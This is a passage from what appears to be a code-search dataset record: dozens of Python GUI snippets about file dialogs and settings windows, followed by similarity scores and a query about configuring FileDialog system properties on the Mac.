absolute_file_path:\n # extract the file name from the absolute path\n file_name = absolute_file_path.split('/')[len(absolute_file_path.split('/')) - 1]\n \n # update the label text\n self.selected_file_name.configure(text=file_name)\n\n self.__set_full_path_of_file(absolute_file_path)\n else:\n # update the label text\n self.selected_file_name.configure(text=\"<Selected file name>\")\n\n self.__set_full_path_of_file(None)", "def onLoadCSVList(self, evt):\n dlg = wx.FileDialog(self.view, \"Choose a file:\", wildcard = \"*.txt; *.csv\" ,\n style=wx.FD_DEFAULT_STYLE | wx.FD_CHANGE_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n print \"You chose %s\" % dlg.GetPath()\n self.config.CSVFilePath = dlg.GetPath()", "def beaker_session_options(self):\n\n session_data_dir = os.path.join(self.APP_DIR, self.SESSION_DIR)\n\n # TODO: Options which should be made into PyWy application options\n options = dict(type='file',\n data_dir=session_data_dir,\n auto=True)\n\n # Standard options\n options.update(invalidate_corrupt=True, timeout=None,\n secret=None, log_file=None,)\n\n return options", "def browse_file_dialog():\n root = Tkinter.Tk()\n # Make window almost invisible to focus it and ensure directory browser\n # doesn't end up loading in the background behind main window.\n root.withdraw()\n root.overrideredirect(True)\n root.geometry('0x0+0+0')\n root.deiconify()\n root.lift()\n root.focus_force()\n root.update()\n file_path = tkFileDialog.askopenfilename()\n root.destroy()\n if file_path:\n return os.path.normpath(file_path)\n else:\n return file_path", "def _get_wipe_selector(editable_property):\n # Preset luma\n combo_box = gtk.combo_box_new_text()\n \n # Get options\n keys = mlttransitions.wipe_lumas.keys()\n # translate here\n keys.sort()\n for k in keys:\n combo_box.append_text(k)\n \n # Set initial value\n k_index = -1\n tokens = 
editable_property.value.split(\"/\")\n test_value = tokens[len(tokens) - 1]\n for k,v in mlttransitions.wipe_lumas.iteritems():\n if v == test_value:\n k_index = keys.index(k)\n \n combo_box.set_active(k_index)\n preset_luma_row = _get_two_column_editor_row(editable_property.get_display_name(), combo_box)\n \n # User luma\n use_preset_luma_combo = gtk.combo_box_new_text()\n use_preset_luma_combo.append_text(_(\"Preset Luma\"))\n use_preset_luma_combo.append_text(_(\"User Luma\"))\n \n dialog = gtk.FileChooserDialog(_(\"Select Luma File\"), None, \n gtk.FILE_CHOOSER_ACTION_OPEN, \n (_(\"Cancel\").encode('utf-8'), gtk.RESPONSE_REJECT,\n _(\"OK\").encode('utf-8'), gtk.RESPONSE_ACCEPT), None)\n dialog.set_action(gtk.FILE_CHOOSER_ACTION_OPEN)\n dialog.set_select_multiple(False)\n file_filter = gtk.FileFilter()\n file_filter.add_pattern(\"*.png\")\n file_filter.add_pattern(\"*.pgm\")\n file_filter.set_name(_(\"Wipe Luma files\"))\n dialog.add_filter(file_filter)\n \n user_luma_select = gtk.FileChooserButton(dialog)\n user_luma_select.set_size_request(210, 28)\n \n user_luma_label = gtk.Label(_(\"Luma File:\"))\n\n if k_index == -1:\n use_preset_luma_combo.set_active(1)\n combo_box.set_sensitive(False)\n combo_box.set_active(0)\n user_luma_select.set_filename(editable_property.value)\n else:\n use_preset_luma_combo.set_active(0)\n user_luma_select.set_sensitive(False)\n user_luma_label.set_sensitive(False)\n \n user_luma_row = gtk.HBox(False, 2)\n user_luma_row.pack_start(use_preset_luma_combo, False, False, 0)\n user_luma_row.pack_start(gtk.Label(), True, True, 0)\n user_luma_row.pack_start(user_luma_label, False, False, 2)\n user_luma_row.pack_start(user_luma_select, False, False, 0)\n\n editor_pane = gtk.VBox(False)\n editor_pane.pack_start(preset_luma_row, False, False, 4)\n editor_pane.pack_start(user_luma_row, False, False, 4)\n\n widgets = (combo_box, use_preset_luma_combo, user_luma_select, user_luma_label, keys)\n \n combo_box.connect(\"changed\", editable_property.combo_selection_changed, keys)\n use_preset_luma_combo.connect(\"changed\", _wipe_preset_combo_changed, editable_property, widgets)\n dialog.connect('response', _wipe_lumafile_dialog_response, editable_property, widgets)\n \n return editor_pane", "def toolPropertyWindow(*args, field: Union[AnyStr, bool]=\"\", helpButton: Union[AnyStr, bool]=\"\",\n icon: Union[AnyStr, bool]=\"\", inMainWindow: bool=True, location:\n Union[AnyStr, bool]=\"\", noviceMode: bool=True, resetButton: Union[AnyStr,\n bool]=\"\", restore: bool=True, selectCommand: Union[AnyStr, bool]=\"\",\n showCommand: Union[AnyStr, bool]=\"\", q=True, query=True, e=True,\n edit=True, **kwargs)->Union[None, Any]:\n pass", "def saveConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getSaveFileName( self, \"Save Full Config As...\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.saveConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def askopenfilename(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n 
self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def setDefaultSettings():\n if PLATFORM == 'Windows':\n font = 'Consolas'\n else:\n font = 'Monospace'\n\n preferenceNode = nuke.toNode('preferences')\n # viewer settings\n preferenceNode['maxPanels'].setValue(5)\n preferenceNode['TextureSize'].setValue('2048x2048')\n preferenceNode['viewer_bg_color_3D'].setValue(1280068863)\n preferenceNode['viewer_fg_color_3D'].setValue(4294967295L)\n preferenceNode['Viewer3DControlEmulation'].setValue('Maya')\n preferenceNode['middleButtonPans'].setValue(False)\n preferenceNode['dot_node_scale'].setValue(1.5)\n\n # script editor settings\n preferenceNode['clearOnSuccess'].setValue(False)\n preferenceNode['echoAllCommands'].setValue(True)\n preferenceNode['ScriptEditorFont'].setValue(font)\n preferenceNode['ScriptEditorFontSize'].setValue(12.0)\n preferenceNode['kwdsFgColour'].setValue(2629566719L)\n preferenceNode['stringLiteralsFgColourDQ'].setValue(10354943)\n preferenceNode['stringLiteralsFgColourSQ'].setValue(10354943)\n preferenceNode['commentsFgColour'].setValue(2442236415L)", "def initialize_options(self):", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def test_path(self):\n options = ControlOptions()\n options.parseOptions([b\"--data-path\", b\"/var/xxx\"])\n self.assertEqual(options[\"data-path\"], FilePath(b\"/var/xxx\"))", "def __init__(self, parent, controller, nextFrame = None, prevFrame = None, message = None):\n\n\t\t# Create a main frame\n\t\tFrame.__init__(self, parent, width = 1000)\n\t\tself.parent = parent\t\t# Window for interface\n\t\tself.controller = controller\n\t\tself.filePath = \"\"\t\t\t# Final file path\n\t\tself.filePathEntry = None\t# File path in browse entry\n\t\tself.continued = False\n\t\tself.nextFrame = nextFrame\n\t\tself.prevFrame = prevFrame\n\t\tself.message = message\n\t\t# Create GUI\n\t\tself.initGUI()", "def preferences(self):\n from dialogs import preferencesDialog\n prefs=preferencesDialog.Create(self,-1,'')\n prefs.ShowModal()", "def browse( self ):\n Tk.Tk().withdraw()\n filename = askopenfilename( initialdir = self.initialdir,\n title = self.title ,\n filetypes = self.filetypes )\n\n if filename == \"\":\n return\n\n self.set_text( filename )\n #rint( f\"get_text = {self.get_text()}\", flush = True )", "def __gitConfigure(self):\n e5App().getObject(\"UserInterface\").showPreferences(\"zzz_gitPage\")", "def _startup_system(self):\n\n self._config_path.set(filedialog.asksaveasfilename())\n self._system = System(self._config_path.get())\n\n self._start_frame.pack_forget()\n self._main_frame.pack()", "def __init__(self, dat_details: dict[str, dict[str, str]], config: Config, parent: Any = None) -> None:\r\n\r\n super(SettingsWindow, self).__init__(parent)\r\n self.ui = Ui_Settings()\r\n self.ui.setupUi(self)\r\n\r\n # Hide the error label\r\n self.ui.labelURLError.hide()\r\n\r\n # The folder location labels don't want to render with promoted subclasses (likely\r\n # the parent is wrong), so we have to do it manually\r\n self.ui.labelCloneListsLocation.hide()\r\n self.ui.labelCloneListsLocation.deleteLater()\r\n 
self.ui.labelCloneListsLocation = ElisionLabel('', mode=qtc.Qt.ElideLeft, parent=self.ui.frameCloneListsLocation) # type: ignore\r\n self.ui.labelCloneListsLocation.setText(qtc.QCoreApplication.translate('Settings', u'No clone list folder selected', None)) # type: ignore\r\n self.ui.labelCloneListsLocation.setObjectName(u'labelCloneListsLocation')\r\n self.ui.labelCloneListsLocation.setGeometry(qtc.QRect(50, 20, 531, 20))\r\n self.ui.labelCloneListsLocation.setStyleSheet('color: #777')\r\n\r\n self.ui.labelMetadataLocation.hide()\r\n self.ui.labelMetadataLocation.deleteLater()\r\n self.ui.labelMetadataLocation = ElisionLabel('', mode=qtc.Qt.ElideLeft, parent=self.ui.frameMetadataLocation) # type: ignore\r\n self.ui.labelMetadataLocation.setText(qtc.QCoreApplication.translate('Settings', u'No metadata folder selected', None)) # type: ignore\r\n self.ui.labelMetadataLocation.setObjectName(u'labelMetadataLocation')\r\n self.ui.labelMetadataLocation.setGeometry(qtc.QRect(50, 20, 531, 20))\r\n self.ui.labelMetadataLocation.setStyleSheet('color: #777')\r\n\r\n # Fix the fonts\r\n set_fonts(self)\r\n\r\n # Get the values from the user config\r\n self.ui.labelCloneListsLocation.setText(str(pathlib.Path(parent.clone_lists_folder).resolve()))\r\n self.ui.labelMetadataLocation.setText(str(pathlib.Path(parent.metadata_folder).resolve()))\r\n self.ui.lineEditCloneListDownloadLocation.setText(parent.clone_list_metadata_url)\r\n\r\n # Set up the interactions\r\n self.ui.buttonChooseCloneListsLocation.clicked.connect(lambda: set_path(parent, parent.clone_lists_folder, self.ui.labelCloneListsLocation, 'clone_lists_folder', input_type='folder'))\r\n self.ui.buttonChooseMetadataLocation.clicked.connect(lambda: set_path(parent, parent.metadata_folder, self.ui.labelMetadataLocation, 'metadata_folder', input_type='folder'))\r\n\r\n def url_entry(url: str) -> None:\r\n \"\"\" Validates a URL, writes to config accordingly.\r\n\r\n Args:\r\n - `url (str)` The URL to validate.\r\n \"\"\"\r\n if not url:\r\n parent.clone_list_metadata_url = config.clone_list_metadata_download_location\r\n return\r\n else:\r\n if validators.url(url):\r\n self.ui.labelURLError.hide()\r\n parent.clone_list_metadata_url = url\r\n write_config(parent, dat_details, config, self)\r\n else:\r\n self.ui.labelURLError.show()\r\n\r\n self.ui.lineEditCloneListDownloadLocation.keyPressed.connect(lambda: url_entry(self.ui.lineEditCloneListDownloadLocation.text()))\r\n\r\n # Set up config writing\r\n self.ui.buttonChooseCloneListsLocation.clicked.connect(lambda: write_config(parent, dat_details, config, self))\r\n self.ui.buttonChooseMetadataLocation.clicked.connect(lambda: write_config(parent, dat_details, config, self))\r\n\r\n def reset_config() -> None:\r\n \"\"\" Resets the settings window when the reset button is clicked. 
\"\"\"\r\n self.ui.labelCloneListsLocation.setText(str(pathlib.Path(config.path_clone_list).resolve()))\r\n self.ui.labelMetadataLocation.setText(str(pathlib.Path(config.path_metadata).resolve()))\r\n self.ui.lineEditCloneListDownloadLocation.setText(config.clone_list_metadata_download_location)\r\n parent.clone_lists_folder = config.path_clone_list\r\n parent.metadata_folder = config.path_metadata\r\n parent.clone_list_metadata_url = config.clone_list_metadata_download_location\r\n write_config(parent, dat_details, config, self)\r\n\r\n self.ui.pushButtonReset.clicked.connect(lambda: reset_config())", "def common_set_options(opt):\n opt.tool_options('compiler_cxx')\n opt.tool_options('compiler_cc')\n opt.tool_options('python')\n \n opt.add_option('--wxpython', action='store_true', default=False, help='Create the wxPython bindings.')\n opt.add_option('--wx-compiler-prefix', action='store', default='vc',\n help='Specify a different compiler prefix (do this if you used COMPILER_PREFIX when building wx itself)')\n opt.add_option('--macosx-version', action='store', default='', help=\"Version of OS X to build for.\")", "def svn_client_copy_source_t_path_set(svn_client_copy_source_t_self, char_path): # real signature unknown; restored from __doc__\n pass", "def persist_macos(self) -> None:", "def invoke (self, context, event):\n context.window_manager.fileselect_add (self)\n return {'RUNNING_MODAL'}", "def FileOpenDialog( message, wildcard, style=0, defaultDir=os.getcwd(), defaultFile='' ):\n style = style | wx.OPEN | wx.CHANGE_DIR\n return FileDialog( message, wildcard, style, defaultDir, defaultFile )", "def carpeta(self):\r\n #Crea el diálogo para seleccionar carpeta\r\n carpeta = (QtWidgets.\r\n QFileDialog.\r\n getExistingDirectory(None, 'Seleccionar Carpeta',\r\n self.cwd, \r\n QtWidgets.QFileDialog.ShowDirsOnly))\r\n #Borra los nombres de archivos que se están mostrando en la lista\r\n self.listWidget.clear()\r\n \r\n #Evalúa si seleccionó una carpeta\r\n if len(carpeta) > 1:\r\n #Lista de los archivos en la carpeta seleccionada\r\n listArchivos = os.listdir(carpeta)\r\n for i in listArchivos:\r\n self.listWidget.addItem(i)", "def QuickClient():\n window = Toplevel(root)\n window.title(\"Connection options\")\n window.grab_set()\n Label(window, text=\"Server IP:\").grid(row=0)\n destination = Entry(window)\n destination.grid(row=0, column=1)\n go = Button(window, text=\"Connect\", command=lambda:\n client_options_go(destination.get(), \"9999\", window))\n go.grid(row=1, column=1)", "def updateStorageOptionComboBox(self, row, filePath):\n assert threading.current_thread().name == \"MainThread\"\n with Tracer(traceLogger):\n # Determine the relative path to this file\n absPath, relPath = getPathVariants(filePath, self.topLevelOperator.WorkingDirectory.value)\n # Add a prefixes to make the options clear\n absPath = \"Absolute Link: \" + absPath\n relPath = \"Relative Link: <project directory>/\" + relPath\n\n combo = QComboBox()\n options = {} # combo data -> combo text\n options[ LocationOptions.AbsolutePath ] = absPath\n options[ LocationOptions.RelativePath ] = relPath\n\n options[ LocationOptions.Project ] = \"Store in Project File\"\n\n for option, text in sorted(options.items()):\n # Add to the combo, storing the option as the item data\n combo.addItem(text, option)\n\n # Select the combo index that matches the current setting\n location = self.topLevelOperator.Dataset[row].value.location\n\n if location == DatasetInfo.Location.ProjectInternal:\n comboData = LocationOptions.Project\n 
elif location == DatasetInfo.Location.FileSystem:\n # Determine if the path is relative or absolute\n if os.path.isabs(self.topLevelOperator.Dataset[row].value.filePath[0]):\n comboData = LocationOptions.AbsolutePath\n else:\n comboData = LocationOptions.RelativePath\n\n comboIndex = combo.findData( QVariant(comboData) )\n combo.setCurrentIndex( comboIndex )\n\n combo.currentIndexChanged.connect( partial(self.handleComboSelectionChanged, combo) )\n self.fileInfoTableWidget.setCellWidget( row, Column.Location, combo )", "def _restore_options(self):\r\n fn = self._opt_file_name()\r\n if os.path.exists(fn):\r\n try:\r\n opt = pickle.load(open(fn, \"r\"))\r\n self.tb_pragma.SetValue(opt[\"topic\"])\r\n self.tb_package.SetValue(opt[\"package\"])\r\n self.tb_file_header.SetValue(opt[\"header\"])\r\n self.tb_target_folder.SetValue(opt[\"target_folder\"])\r\n self.tb_encoding.SetValue(opt[\"encoding\"])\r\n except Exception as ex:\r\n print(\"Error durring restore default options\")\r\n print(ex)", "def __init__(self, parent, app_path):\r\n self.app_path = app_path\r\n self.ssid = tkinter.StringVar()\r\n self.connection_mode = tkinter.StringVar()\r\n self.authentication = tkinter.StringVar()\r\n self.encryption = tkinter.StringVar()\r\n self.password = tkinter.StringVar()\r\n self.profile_data = []\r\n # calling constructor of base class.\r\n BasicDialog.__init__(self, parent, title=None)", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_SAVE)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n \n dlg.Destroy()", "def configure(options):\n configuring = Configuring()\n configuring.run()\n config = configuring.config\n\n # Install the right dependencies\n print_to_terminal(\"Installing extra dependencies (webkit, gth and simplejson)\")\n to_install_packages = ['python-webkit', 'python-gtk2', 'python-simplejson']\n subprocess.call(['sudo', 'apt-get', 'install']+to_install_packages)\n\n # Create fancy desktop entry\n for file in ['viki.desktop', 'viki_env.sh', 'viki_launch.sh']:\n process_template(file, config)\n os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC)\n app_dir = os.path.expanduser('~/.local/share/applications')\n command = \"desktop-file-install --dir={} {}/viki.desktop\".format(app_dir, os.getcwd())\n subprocess.call(command, shell=True)\n return None", "def client_settings():\n return CLIENT_SETTINGS", "def set(self):\n \n ffmpeg_installed = misc.askquestion(DialogTitle='FFMPEG Check',\n Question='Is FFMPEG installed?')\n \n if ffmpeg_installed:\n ffmpeg_dir = misc.get_dir(DialogTitle='Please select the directory where FFMPEG (binary) is installed:')\n \n if sys.platform=='win32':\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg.exe')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay.exe')\n else:\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay')\n \n if not os.path.exists(self.ffmpeg):\n print('Sorry, {0} does not exist!'.format(self.ffmpeg))\n return\n \n if not os.path.exists(self.ffplay):\n print('Sorry, {0} does not exist!'.format(self.ffplay))\n return\n \n else:\n self.ffmpeg = None\n self.ffplay = None\n \n # Save them to the default config file\n info = {'ffmpeg':self.ffmpeg, 'ffplay': self.ffplay}\n try:\n with open(self.config_file, 'w') as outFile:\n json.dump(info, outFile)\n print('Config information written to {0}'.format(os.path.abspath(self.config_file)))\n 
except PermissionError as e:\n curDir = os.path.abspath(os.curdir)\n print('Current directory: {0}'.format(curDir))\n print('Error: {0}'.format(e))\n \n return", "def UpdateDisplay(self):\n ##Jconf\n self.chJconf.Clear()\n for name in self.state.GetSurface(\"JconfDict\").GetNames():\n self.chJconf.Append(name)\n self.chJconf.SetStringSelection(self.state.GetSurface(\"JconfSelection\"))\n self.chJconf.Enable(self.state.IsEnabled(\"JconfDict\") == True and\n self.state.IsEnabled(\"JconfSelection\") == True and\n self.state.GetSurface(\"Xplorer\") == True)\n self.bEditJconf.Enable(self.state.IsEnabled(\"JconfDict\") and\n self.state.GetSurface(\"Xplorer\") == True)\n ##Name Server\n self.cbNameServer.SetValue(self.state.GetSurface(\"NameServer\"))\n self.cbNameServer.Enable(self.state.IsEnabled(\"NameServer\"))\n ##Conductor\n self.cbConductor.SetValue(self.state.GetSurface(\"Conductor\"))\n self.cbConductor.Enable(self.state.IsEnabled(\"Conductor\"))\n ##Xplorer\n self.cbXplorer.SetValue(self.state.GetSurface(\"Xplorer\"))\n self.cbXplorer.Enable(self.state.IsEnabled(\"Xplorer\"))\n ##Desktop Mode\n self.cbDesktop.SetValue(self.state.GetSurface(\"DesktopMode\"))\n self.cbDesktop.Enable(self.state.IsEnabled(\"DesktopMode\"))\n ##Xplorer Type\n if self.state.GetSurface(\"DesktopMode\"):\n self.rbXplorer.SetSelection(0)\n else:\n if (self.state.GetSurface(\"XplorerType\") == \"OSG-VEP\"):\n self.rbXplorer.SetSelection(0)\n else:\n self.rbXplorer.SetSelection(1)\n self.rbXplorer.Enable(self.state.IsEnabled(\"XplorerType\") == True and\n self.state.GetSurface(\"DesktopMode\") == False and\n self.state.GetSurface(\"Xplorer\") == True)\n ##Cluster Node button\n self.bCluster.Enable(CLUSTER_ENABLED and\n self.state.GetSurface(\"Xplorer\") == True and\n self.state.GetSurface(\"DesktopMode\") == False and\n self.state.GetSurface(\"XplorerType\") == \"OSG-VEPC\")\n return", "def __init__(self, source, parent=None, move=False, force=False):\n super(SvnCopyDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.source = source\n if os.path.isdir(self.source):\n self.targetPicker.setMode(E5PathPickerModes.DirectoryMode)\n else:\n self.targetPicker.setMode(E5PathPickerModes.SaveFileMode)\n \n if move:\n self.setWindowTitle(self.tr('Subversion Move'))\n else:\n self.forceCheckBox.setEnabled(False)\n self.forceCheckBox.setChecked(force)\n \n self.sourceEdit.setText(source)\n \n self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)\n \n msh = self.minimumSizeHint()\n self.resize(max(self.width(), msh.width()), msh.height())", "def accept(self):\n acceptSelection = self.acceptCombo.currentIndex()\n if acceptSelection == 0:\n acceptPolicy = CookieJar.AcceptAlways\n elif acceptSelection == 1:\n acceptPolicy = CookieJar.AcceptNever\n elif acceptSelection == 2:\n acceptPolicy = CookieJar.AcceptOnlyFromSitesNavigatedTo\n \n keepSelection = self.keepUntilCombo.currentIndex()\n if keepSelection == 0:\n keepPolicy = CookieJar.KeepUntilExpire\n elif keepSelection == 1:\n keepPolicy = CookieJar.KeepUntilExit\n \n jar = self.__mw.cookieJar()\n jar.setAcceptPolicy(acceptPolicy)\n jar.setKeepPolicy(keepPolicy)\n jar.setFilterTrackingCookies(\n self.filterTrackingCookiesCheckbox.isChecked())\n \n super(CookiesConfigurationDialog, self).accept()", "def choosefile():\r\n\r\n # get filename\r\n filename = tkFileDialog.askopenfilename(**options)\r\n #print filename, '*****'\r\n\r\n # open file on your own\r\n if filename:\r\n #return open(filename, 'r')\r\n tasks.upload_chosen = filename", "def setfilepaths():\n\n 
if gethostname() in ['stable', 'challenger', 'p', 'fog']:\n ncDir = '/home/disk/eos9/woelfle/cesm/nobackup/cesm1to2/'\n ncSubDir = '0.9x1.25/'\n saveDir = ('/home/disk/user_www/woelfle/cesm1to2/')\n\n elif gethostname() == 'woelfle-laptop':\n ncDir = 'C:\\\\Users\\\\woelfle\\\\Documents\\\\UW\\\\CESM\\\\hist\\\\'\n ncSubDir = ''\n saveDir = 'C:\\\\Users\\\\woelfle\\\\Documents\\\\UW\\\\CESM\\\\figs\\\\'\n\n elif gethostname()[0:6] in ['yslogi', 'geyser']:\n ncDir = '/glade/p/cgd/amp/people/hannay/amwg/climo/'\n ncSubDir = '0.9x1.25/'\n saveDir = '/glade/p/work/woelfle/figs/cesm1to2/'\n\n return (ncDir, ncSubDir, saveDir)", "def options_set(self):\n\n global OPTIONS\n OPTIONS.append(config.ENABLE(self.threaded))\n OPTIONS.append(config.ENABLE(self.datasaver))\n OPTIONS.append(self.language)", "def __init__(self, controller):\n matplotlib.use('TkAgg')\n self.version = \"1.4 20170920 (tk)\"\n self.controller = controller # previously referred as 'parent'\n self.tk_root = tk.Tk()\n self.tk_root.title(\"supersid @ \" + self.controller.config['site_name'])\n\n # All Menus creation\n menubar = tk.Menu(self.tk_root)\n filemenu = tk.Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Save Raw buffers\", command=lambda: self.save_file('r'),underline=5,accelerator=\"Ctrl+R\")\n filemenu.add_command(label=\"Save Filtered buffers\", command=lambda: self.save_file('f'),underline=5,accelerator=\"Ctrl+F\")\n filemenu.add_command(label=\"Save Extended raw buffers\", command=lambda: self.save_file('e'),underline=5,accelerator=\"Ctrl+E\")\n filemenu.add_command(label=\"Save filtered as ...\", command=lambda: self.save_file('s'),underline=5,accelerator=\"Ctrl+S\")\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=lambda : self.close(force_close=False)) # ,underline=1,accelerator=\"Ctrl+X\")\n self.tk_root.bind_all(\"<Control-r>\", self.save_file)\n self.tk_root.bind_all(\"<Control-f>\", self.save_file)\n self.tk_root.bind_all(\"<Control-e>\", self.save_file)\n self.tk_root.bind_all(\"<Control-s>\", self.save_file)\n self.tk_root.protocol(\"WM_DELETE_WINDOW\", lambda : self.close(False)) # user click on the [X] to close the window\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n helpmenu = tk.Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About...\", command=self.on_about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n self.tk_root.config(menu=menubar)\n\n # FigureCanvas\n self.psd_figure = Figure(facecolor='beige')\n self.canvas = FigureCanvas(self.psd_figure, master=self.tk_root)\n self.canvas.draw()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.toolbar = NavigationToolbar2Tk( self.canvas, self.tk_root)\n self.toolbar.update()\n self.canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.axes = self.psd_figure.add_subplot(111)\n #self.axes.hold(False)\n\n # StatusBar\n self.statusbar_txt = tk.StringVar()\n self.label=tk.Label(self.tk_root, bd=1, relief=tk.SUNKEN, anchor=tk.W,\n textvariable=self.statusbar_txt,\n font=('arial',12,'normal'))\n self.statusbar_txt.set('Initialization...')\n self.label.pack(fill=tk.X)", "def _options(self):\r\n xmi_file = self.tb_xmi_file_name.GetValue()\r\n topic = self.tb_pragma.GetValue()\r\n package = self.tb_package.GetValue()\r\n header = self.tb_file_header.GetValue()\r\n target_folder = self.tb_target_folder.GetValue()\r\n encoding = self.tb_encoding.GetValue()\r\n \r\n return {\"topic\" : topic, \r\n \"package\" : package, \r\n \"header\" : header, \r\n 
\"target_folder\" : target_folder,\r\n \"encoding\" : encoding,\r\n \"xmi_file\" : xmi_file}", "def script_properties():\n props = obs.obs_properties_create()\n p = obs.obs_properties_add_list(props, \"source\", \"Text Source\",\n obs.OBS_COMBO_TYPE_EDITABLE,\n obs.OBS_COMBO_FORMAT_STRING)\n sources = obs.obs_enum_sources()\n if sources is not None:\n for source in sources:\n source_id = obs.obs_source_get_id(source)\n if source_id == \"text_gdiplus\" or source_id == \"text_ft2_source\":\n name = obs.obs_source_get_name(source)\n obs.obs_property_list_add_string(p, name, name)\n\n obs.source_list_release(sources)\n\n obs.obs_properties_add_button(props, \"button\", \"Start Overlay\", start_overlay)\n obs.obs_properties_add_button(props, \"button2\", \"Stop Overlay\", stop_overlay)\n\n return props", "def set_defaults(self):\n if self.main_win.working_dir is None or self.main_win.id is None or \\\n len(self.main_win.working_dir) == 0 or len(self.main_win.id) == 0:\n msg_window('Working Directory or Reconstruction ID not configured')\n else:\n self.reconstructions.setText('1')\n self.device.setText('(0,1)')\n self.alg_seq.setText('((3,(\"ER\",20),(\"HIO\",180)),(1,(\"ER\",20)))')\n self.beta.setText('.9')\n self.support_area.setText('(0.5, 0.5, 0.5)')\n self.cont.setChecked(False)", "def onSave(self):\r\n # productive #onButton\r\n profprint()\r\n\r\n self.dirDialog = qt.QFileDialog(self.parent)\r\n self.dirDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config\"))\r\n self.dirDialog.options = self.dirDialog.DontUseNativeDialog\r\n self.dirDialog.acceptMode = self.dirDialog.AcceptSave\r\n self.dirDialog.defaultSuffix = \"cfg\"\r\n self.dirDialog.setNameFilter(\"Configuration file (*.cfg)\")\r\n self.dirDialog.connect(\"fileSelected(QString)\", self.saveFileSelected)\r\n self.dirDialog.show()", "def browse_files_out(self,*args):\n path_to_data = tkFileDialog.askopenfilename()\n #show chosen value in textframe\n self.docstring_offers.delete(0,tk.END)\n self.docstring_offers.insert(0,path_to_data)\n #use chosen value as self.exchanged_offers_filepa\n self.exchanged_offers_filepath.set(path_to_data)", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n self._save_state()\n \n dlg.Destroy()", "def _create_default_config(self):\n self.options.setdefault('options.admin_passwd', '')\n sys.path.append(self.openerp_dir)\n sys.path.extend([egg.location for egg in self.ws])\n from openerp.tools.config import configmanager\n configmanager(self.config_path).save()", "def AddGeneralGClientProperties(factory_properties):\n # Make sure that pulled in projects have the right revision based on date.\n factory_properties['gclient_transitive'] = True\n # Don't set branch part on the --revision flag - we don't use standard\n # chromium layout and hence this is doing the wrong thing.\n factory_properties['no_gclient_branch'] = True", "def test_default(self):\r\n self.assertEqual(self.option.default, '/tmp')" ]
[ "0.59659076", "0.52273905", "0.52243555", "0.5196339", "0.51798254", "0.51786554", "0.51282394", "0.5127446", "0.51222116", "0.51085234", "0.5083295", "0.50667393", "0.5033301", "0.5033301", "0.5033301", "0.5008447", "0.5006361", "0.4993501", "0.49912578", "0.49555835", "0.49392104", "0.49265411", "0.49237505", "0.49206007", "0.49100357", "0.48970252", "0.48811245", "0.48734605", "0.4852869", "0.4848985", "0.4842083", "0.48382214", "0.48151556", "0.4811101", "0.48058578", "0.47975108", "0.47974765", "0.47714505", "0.47614014", "0.47489163", "0.47414377", "0.47405484", "0.47257885", "0.47219405", "0.47174987", "0.47070086", "0.4706983", "0.4705095", "0.4696061", "0.46888623", "0.46863505", "0.4683354", "0.46734032", "0.46635628", "0.46620125", "0.46620125", "0.4652894", "0.46454036", "0.46449995", "0.4642293", "0.4642293", "0.4642293", "0.4642293", "0.46374214", "0.46372226", "0.46341464", "0.4634017", "0.4633058", "0.46303576", "0.46300155", "0.4629459", "0.46286058", "0.4620312", "0.4613696", "0.45993903", "0.45948443", "0.45938003", "0.4591018", "0.45817998", "0.45745134", "0.45735717", "0.45734978", "0.45692542", "0.45668367", "0.45600918", "0.4554547", "0.45528924", "0.45454097", "0.45368454", "0.45345247", "0.4531826", "0.45277214", "0.45274943", "0.45229498", "0.45228368", "0.45186335", "0.4515871", "0.4514041", "0.45078716", "0.45039243" ]
0.60916245
0
sets up System Properties for FileDialog() to behave as required >> Mac only
